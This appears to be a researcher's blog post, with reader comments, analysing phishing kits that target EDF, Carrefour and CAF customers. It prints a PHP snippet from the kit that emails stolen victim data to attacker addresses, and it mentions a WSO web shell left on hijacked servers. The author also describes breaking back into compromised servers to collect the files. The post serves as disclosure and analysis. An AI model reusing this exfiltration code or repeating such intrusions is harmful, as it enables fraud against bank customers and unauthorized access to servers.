EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33
bigcave.php:
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024
Mechanism is interesting on this one
It extract a zip file inside a a freslhy created dir and write EDF customer IP on Vcounter.txt
Seem the bad guys tested it to see if everything work :)
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)
The bad guys leaved Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:
'Nice'
Spamtool:
And some others craps...
For CAF and Carrefour they have not used Hijacked servers (just for redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804
The CAF mail is just a big failure:
Bank customers reply to phishing e-mail:
A new tool appeared, phishers will be probably interested.
Also i got an interesting mail:
I concider myself as borderline, i re-break theses servers with my real IP to get the malicious stuff.
I leave files untouched, including hackers files, sometime i probably make more shit than them on log files, i don't edit thems to hide my IP.
I never got sued for hacking a compromised machine and i hope that will not happen.
Hope you won't get sued for your interesting work.
ReplyDeleteDéjà qu'ils ne voient pas que leur serveur est corrompu, alors qu'il se rendent compte que tu es venu faire un tour... tu peux rester tranquille :)
ReplyDeleteEn tout cas continu comme ça, tes articles sont vraiment sympa!